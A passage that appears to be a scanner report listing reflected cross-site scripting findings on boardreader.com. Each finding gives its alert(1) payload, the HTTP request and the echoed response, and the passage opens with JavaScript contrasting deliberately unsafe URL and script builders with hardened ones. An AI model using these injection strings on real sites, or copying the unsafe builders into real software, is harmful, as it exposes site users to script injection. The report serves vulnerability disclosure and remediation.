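const GRAPH_ENDPOINT = '/linksGraphXML.php';           // endpoint seen in the response
const KNOWN_PARAMS = new Set(['p', 'd', 'b', 'g', 'x']); // assumption: the page's own parameters

// encodeURIComponent leaves ' ( ) ! * alone, and ' is exactly what the 1.83
// payload needs. Percent-encode those too (RFC 3986 unreserved set only).
function strictEncode(s) {
  return encodeURIComponent(s).replace(/[!'()*]/g,
    c => '%' + c.charCodeAt(0).toString(16).toUpperCase());
}

// Vulnerable rebuild, reconstructed from the behaviour in the report: the q
// value is encoded, but every parameter name is concatenated raw.
function buildGraphUrlUnsafe(domain, params) {
  let url = GRAPH_ENDPOINT + '?a=domain&q=' + encodeURIComponent(domain);
  for (const [name, value] of params) {
    url += '&' + name + '=' + encodeURIComponent(value);
  }
  return url;
}

// Hardened rebuild: copy only parameters the page knows, and strictly encode
// both name and value.
function buildGraphUrlSafe(domain, params) {
  const parts = ['a=domain', 'q=' + strictEncode(domain)];
  for (const [name, value] of params) {
    if (!KNOWN_PARAMS.has(name)) continue;
    parts.push(strictEncode(name) + '=' + strictEncode(value));
  }
  return GRAPH_ENDPOINT + '?' + parts.join('&');
}

// Issue 1.83: the URL is pasted between single quotes inside <script>.
function renderScriptUnsafe(url) {
  return "<script>var ACTIVE_GRAPH_URL = '" + url + "';</script>";
}

// A JSON-encoded string is a valid JavaScript string literal; escaping < as
// well stops "</script>" in the data from closing the element.
function jsLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function renderScriptSafe(url) {
  return '<script>var ACTIVE_GRAPH_URL = ' + jsLiteral(url) + ';</script>';
}

// Issue 1.84: the URL is pasted into a double-quoted href attribute.
function renderAnchorUnsafe(url) {
  return '<a class="fp_adv" href="' + url + '">advanced</a>';
}

// HTML attribute encoding of the characters that can end a value or a tag.
function htmlAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/'/g, '&#39;')
    .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function renderAnchorSafe(url) {
  return '<a class="fp_adv" href="' + htmlAttr(url) + '">advanced</a>';
}

// Stand-alone run with the two payloads from the report (parameter value "1").
function main() {
  const domain = '2mdn.net/x22';
  for (const payload of ["b358d'-alert(1)-'f4b7b9879fc",
                         'ebef7"><script>alert(1)</script>6f696982a6d']) {
    const params = [[payload, '1'], ['p', '30']];
    const unsafeUrl = buildGraphUrlUnsafe(domain, params);
    console.log('unsafe script :', renderScriptUnsafe(unsafeUrl));
    console.log('unsafe anchor :', renderAnchorUnsafe(unsafeUrl));
    console.log('safe script   :', renderScriptSafe(unsafeUrl));
    console.log('safe anchor   :', renderAnchorSafe(unsafeUrl));
    console.log('safe rebuild  :', buildGraphUrlSafe(domain, params));
  }
}
main();
```

Two layers are applied. The rebuild copies only known parameter names and percent-encodes them strictly, so a hostile name never reaches the page; the emitters encode for their own output context (a JSON-derived JavaScript literal with < escaped, HTML attribute encoding for the href), which is what removes the bug even when a hostile URL does get through. The safe emitters are deliberately fed the unsafe URL to show that the output encoding holds on its own.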
1.85. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/aol.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94a63'-alert(1)-'782a59af270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/aol.com?94a63'-alert(1)-'782a59af270=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:02:03 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:02:10 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=aol.com&94a63'-alert(1)-'782a59af270=1&p=30&d=1288940530&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.86. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/aol.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e75"><script>alert(1)</script>f6043616387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/aol.com?f0e75"><script>alert(1)</script>f6043616387=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:01:40 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:01:45 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/aol.com?f0e75"><script>alert(1)</script>f6043616387=1"> ...[SNIP]...
1.87. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/cafemom.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3ee"><script>alert(1)</script>40468857845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:05 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:18 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1"> ...[SNIP]...
1.88. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/cafemom.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3d7'-alert(1)-'2f4ee664641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/cafemom.com?3c3d7'-alert(1)-'2f4ee664641=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:47 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=cafemom.com&3c3d7'-alert(1)-'2f4ee664641=1&p=30&d=1288939967&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.89. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/myegy.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f3c"><script>alert(1)</script>bb270b2c8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:29 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:58:37 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1"> ...[SNIP]...
1.90. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/myegy.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1683'-alert(1)-'aae0d7e564f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/myegy.com?c1683'-alert(1)-'aae0d7e564f=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:55 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:59:00 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=myegy.com&c1683'-alert(1)-'aae0d7e564f=1&p=30&d=1288940340&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.91. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/nolanfans.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7be"><script>alert(1)</script>8eb8f9da978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:53 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:09 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1"> ...[SNIP]...
1.92. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/nolanfans.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9419e'-alert(1)-'6dbeba69c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/nolanfans.com?9419e'-alert(1)-'6dbeba69c1=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:22 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:24 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=nolanfans.com&9419e'-alert(1)-'6dbeba69c1=1&p=30&d=1288940004&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.93. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/ratedesi.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe4a"><script>alert(1)</script>5a4d6909fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:30 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1"> ...[SNIP]...
1.94. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/ratedesi.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f15'-alert(1)-'e30e737b55a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/ratedesi.com?d8f15'-alert(1)-'e30e737b55a=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:54:06 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:54:08 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ratedesi.com&d8f15'-alert(1)-'e30e737b55a=1&p=30&d=1288940048&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.95. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/sherdog.net
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c1b"><script>alert(1)</script>c6dc46feb64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:15 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:17 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1"> ...[SNIP]...
1.96. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/sherdog.net
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fd25'-alert(1)-'46ee574fc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/sherdog.net?3fd25'-alert(1)-'46ee574fc5=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:27 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:29 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=sherdog.net&3fd25'-alert(1)-'46ee574fc5=1&p=30&d=1288940009&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.97. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/ufc.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b68"><script>alert(1)</script>31e4bcbef97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:46 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1"> ...[SNIP]...
1.98. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/ufc.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2be3e'-alert(1)-'8c796450d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/ufc.com?2be3e'-alert(1)-'8c796450d60=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:13 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:15 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ufc.com&2be3e'-alert(1)-'8c796450d60=1&p=30&d=1288939995&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.99. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/websitetoolbox.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f166'-alert(1)-'182d880e185 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/websitetoolbox.com?3f166'-alert(1)-'182d880e185=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
